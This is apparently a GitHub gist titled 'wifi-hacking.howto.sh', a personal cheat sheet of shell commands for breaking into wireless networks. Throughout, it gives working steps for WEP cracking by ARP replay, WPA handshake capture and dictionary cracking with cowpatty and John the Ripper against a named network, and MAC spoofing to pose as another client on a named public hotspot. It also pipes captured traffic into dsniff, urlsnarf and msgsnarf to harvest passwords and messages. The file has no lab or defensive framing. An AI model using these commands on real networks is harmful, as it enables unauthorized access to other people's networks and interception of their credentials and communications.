Last active
August 19, 2023 16:34
-
-
Save epcim/7538d035a2918a73e06e to your computer and use it in GitHub Desktop.
wifi-hacking.howto.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##-- repeatedly find hosts -- | |
IP_RANGE=172.25.25.0-254 | |
HOST_LIST=HostList | |
HOST_LIST_NEW=.tmp_hln | |
TMP_NEWIP=.tmp_newip | |
touch $HOST_LIST | |
nmap -sL -e eth0 -PI -PT -T2 -PS $IP_RANGE | grep -B1 MAC | grep -v "\-\-" | sed -e 's/not scanned//' > $HOST_LIST_NEW | |
for i in `grep Host $HOST_LIST_NEW| awk '{print $2}'`; do [ `grep $i $HOST_LIST | wc -l` -eq 0 ] && echo $i; done > $TMP_NEWIP | |
for i in `cat $TMP_NEWIP`; do grep -A1 $i $HOST_LIST_NEW; done >> $HOST_LIST | |
## Mark UP hosts | |
sed -e 's/ - IS UP NOW//' $HOST_LIST > $HOST_LIST.tmp; mv $HOST_LIST.tmp $HOST_LIST; | |
for i in `grep Host $HOST_LIST_NEW | awk '{print $2}'`; do sed -e "s/$i/$i - IS UP NOW/g" $HOST_LIST > $HOST_LIST.tmp; mv $HOST_LIST.tmp $HOST_LIST; done | |
--------------------------- | |
sudo aireplay-ng -b 00:0B:6B:4D:FD:38 -h 00:4F:62:11:01:25 --arpreplay eth0 | |
sudo airodump-ng --ivs --channel 10 --write kralovice eth0 | |
sudo aircrack-ng eth0 kralovice 11 1 | |
sudo macchanger -m 00:4F:62:11:01:25 eth0 | |
kismet | |
pmi-driftnet -f /tmp/kismet_dump | |
tail --lines=+1 -f /tmp/Kismet-Dec-28-2007-9.dump | dsniff -p - | |
tail --lines=+1 -f /tmp/Kismet-Dec-28-2007-9.dump | msgsnarf -p - | |
tail --lines=+1 -f /tmp/Kismet-Dec-28-2007-9.dump | webspy -p - HOST | |
9:38> qlist dsniff |grep bin <epcim@dontpanic:~/tmp | |
/usr/sbin/dnsspoof | |
/usr/sbin/filesnarf | |
/usr/sbin/macof | |
/usr/sbin/sshow | |
/usr/sbin/tcpkill | |
/usr/sbin/tcpnice | |
/usr/sbin/sshmitm | |
/usr/sbin/dsniff | |
/usr/sbin/webspy | |
/usr/sbin/urlsnarf | |
/usr/sbin/arpspoof | |
/usr/sbin/webmitm | |
/usr/sbin/mailsnarf | |
/usr/sbin/msgsnarf | |
########### | |
Another small problem, tcpreplay doesn't understand 802.11 headers: | |
slax ~ # tcpreplay -i lo dump.cap | |
sending on: lo | |
validate_l2(): Unsupported datalink type: 802.11 (0x69) | |
No to worry, airdecap-ng can convert the capture to straight ethernet. Normally you use this program to decrypt encrypted 802.11 data, but you can | |
also use it just to strip the 802.11 headers: | |
slax ~ # airdecap-ng dump.cap | |
Total number of packets read 256828 | |
Total number of WEP data packets 315 | |
Total number of WPA data packets 0 | |
Number of plaintext data packets 42287 | |
Number of decrypted WEP packets 0 | |
Number of decrypted WPA packets 0 | |
This creates a file named dump-dec.cap. If you need to decrypt the data as well, just include the necessary parameters (for example -e and -w) in the | |
airdecap-ng command. | |
Now we're going to replay the data on the local loopback ethernet interface (lo). This gives us an interface to send the data on without actually | |
sending it out over the air or on the local network. | |
First start your programs to listen on the local interface (in different sessions of course, so you can see the output of each): | |
slax ~ # dsniff -i lo | |
slax ~ # driftnet -i lo | |
slax ~ # urlsnarf -i lo | |
slax ~ # msgsnarf -i lo | |
Then run tcpreplay (the -R option speeds up the replay): | |
slax ~ # tcpreplay -i lo -R dump-dec.cap | |
# PMi | |
# Kismet | |
sudo kismet_server | |
#tee -a /tmp/kismet_dump.tee < /tmp/kismet_dump | |
tee /tmp/kismet_dump.tee < /tmp/kismet_dump | dsniff -p - | |
tail --lines=+1 -f /tmp/kismet_dump.tee | urlsnarf -p - | |
kismet_client | |
# WPA - brute force dict key hack, example for "edward1218" | |
1. locate network with kismet/capture some data (four-way handshake) | |
Alternatively: | |
# sudo airodump-ng --channel 11 --bssid 00:24:B2:8C:8A:BA --write ./airodump-edward-ch11.dump wlan0 | |
2. fun dict attack with cowpatty 4.6 | |
# cd ~/tmp/crackers/cowpatty-4.6 | |
# ./cowpatty -r ~/tmp/akl-wifihack/airodump-edward-ch11.dump-01.cap -f /home/epcim/tmp/crackers/wpalist.txt -s "edward1218" | |
3. try luck | |
# echo edward1218 > tryfirst.john <epcim@adrika-netbk:~/tmp | |
# echo edward >> tryfirst.john | |
# john -session:/tmp/delme -wordlist:tryfirst.john -rules -stdout | ./cowpatty -r ~/tmp/akl-wifihack/airodump-edward-ch11.dump-01.cap -f - -s "edward1218" | |
4. if no success, try john ripper | |
# shuffe | |
# john -wordlist:/hg2g/av/wpalist-shuf.txt -rules -session:/tmp/johnrestore.dat -stdout:63 | ./cowpatty -r ~/tmp/akl-wifihack/airodump-edward-ch11.dump-01.cap -f - -s "edward1218" | |
# a-z | |
# john -wordlist:/home/epcim/tmp/crackers/wpalist.txt -rules -session:johnrestore.dat -stdout:63 | ./cowpatty -r ~/tmp/akl-wifihack/airodump-edward-ch11.dump-01.cap -f - -s "edward1218" | |
# Behave as another client | |
export NMAC=00:16:CE:4A:15:7D | |
sudo ifconfig wlan0 down | |
sudo macchanger -m "$NMAC" wlan0 | |
sudo iwconfig wlan0 mode Managed | |
sudo iwconfig wlan0 ap 00:23:69:3A:DC:3A | |
sudo iwconfig wlan0 essid "Zenbu.net.nz - Muri Beach" | |
sudo iwconfig wlan0 channell 1 | |
sudo iwconfig wlan0 frag 256 | |
sudo iwconfig wlan0 retry 3 | |
sudo iwconfig wlan0 txpower 20 | |
sudo ifconfig wlan0 up | |
sudo ifconfig wlan0 inet 10.10.24.89 netmask 255.255.255.0; | |
sudo route set default gw 10.10.24.1 | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment